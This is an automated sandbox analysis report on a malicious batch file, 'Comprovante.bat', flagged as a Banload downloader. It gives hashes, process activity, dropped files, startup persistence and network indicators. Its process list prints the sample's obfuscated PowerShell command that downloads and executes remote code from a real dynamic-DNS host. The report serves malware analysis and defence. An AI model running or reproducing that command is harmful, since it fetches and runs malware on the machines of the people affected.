analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Comprovante.bat

Full analysis: https://app.any.run/tasks/5507b3d1-6732-403d-8da8-f9ae163a92e4
Verdict: Malicious activity
Analysis date: July 17, 2019, 07:23:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
autoit
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

24F1A849886F36A180A13559E9ED63AF

SHA1:

2081D392B76FCCBD8BDE67B1D8DAA58CF95723FE

SHA256:

7C42C9B81CF2E578CAB174F777B513979D0135659C0D064E1F73D0A4BDA52CE4

SSDEEP:

12:XmmKzQe1Rt7wOCFPRzt9XbT5Cq1H8lIYlkArlwQlq:XczQc7IFPBHTAqMpZa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 1048)
    • Writes to a start menu file

      • powershell.exe (PID: 2480)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3940)
  • SUSPICIOUS

    • Drop AutoIt3 executable file

      • powershell.exe (PID: 2480)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2480)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3940)
    • Creates files in the user directory

      • powershell.exe (PID: 2480)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs powershell.exe shutdown.exe no specs searchprotocolhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3940cmd /c ""C:\Users\admin\AppData\Local\Temp\Comprovante.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1860C:\Windows\system32\cmd.exe /S /D /c" echo ieX("Ie`X`(N`ew-oBJ`e`Ct N`et.`Web`ClIeNt`).DOwnlOa`d`StRIN`G('http://a9b1-c34fd1.hopto.org/l0107/kk/1445785485')"); "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2480WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3364"C:\WINDOWS\system32\shutdown.exe" -r -t 200C:\WINDOWS\system32\shutdown.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1048"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe6_ Global\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\System32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7600.16385 (win7_rtm.090713-1255)
Total events
733
Read events
660
Write events
0
Delete events
0

Modification events

No data
Executable files
7
Suspicious files
3
Text files
7
Unknown types
3

Dropped files

PID
Process
Filename
Type
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JKARWTB1KWYJTO9UVA8J.temp
MD5:
SHA256:
2480powershell.exeC:\Users\Public\Java_prqfxk9_\12.dll
MD5:
SHA256:
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFdf398.TMPbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
2480powershell.exeC:\users\public\Java_prqfxk9_\Java_prqfxk9_.zipcompressed
MD5:B0D8F8657A6323BF63483FD72053EF60
SHA256:3A101F385D479F0FB1465E297DEBBC8BA81888F9B1CA49420A0731F1736C4EF2
2480powershell.exeC:\users\public\Java_prqfxk9_\Java_prqfxk9_.LNSexecutable
MD5:9BC1BCD61DF9D0B36AA817D61A4AFC1A
SHA256:5D78D733DA3106E34E2391C3090DE691B288CA3F704E45E3408B8D6C2960EFF1
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
2480powershell.exeC:\users\public\i.dattext
MD5:D2A109E54849AB9AFF701AA6D1D1083B
SHA256:73818EB448841E969F1B37D72019CCE62B6E3A5C5374D85DEC594435690DF599
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java_prqfxk9_.lnklnk
MD5:261F929363155A77B4878E9E44598340
SHA256:520F090C8B6B98E1B31A95B5DA66B8A0997BAF4147B11AAD7772BD8C8A62BC1D
2480powershell.exeC:\users\public\Java_prqfxk9_\Java_prqfxk9_1.LNStext
MD5:98444AB87BAAE533C7014958A07993DE
SHA256:F6913F5209BEE0241626643145C6C830817D8DC8300C4E2B7E627C6D7FADF5F3
2480powershell.exeC:\users\public\c.lnklnk
MD5:20AC5C5B3C865F741F42F8F526B08035
SHA256:4D51C72EB5A02DDFCD2E434B002EAD661F4080BD0FC0C83AF63E949A86A0EE80
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2480
powershell.exe
GET
200
51.91.248.86:80
http://51.91.248.86/M1106/kk/md.zip
GB
compressed
11.4 Mb
malicious
2480
powershell.exe
GET
200
51.91.248.86:80
http://a9b1-c34fd1.hopto.org/l0107/kk/1445785485
GB
text
7.81 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2480
powershell.exe
51.91.248.86:80
a9b1-c34fd1.hopto.org
GB
malicious

DNS requests

Domain
IP
Reputation
a9b1-c34fd1.hopto.org
  • 51.91.248.86
malicious

Threats

PID
Process
Class
Message
2480
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Connection To DDNS Domain Hopto.org
2480
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
2480
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Downloader.Banload
No debug info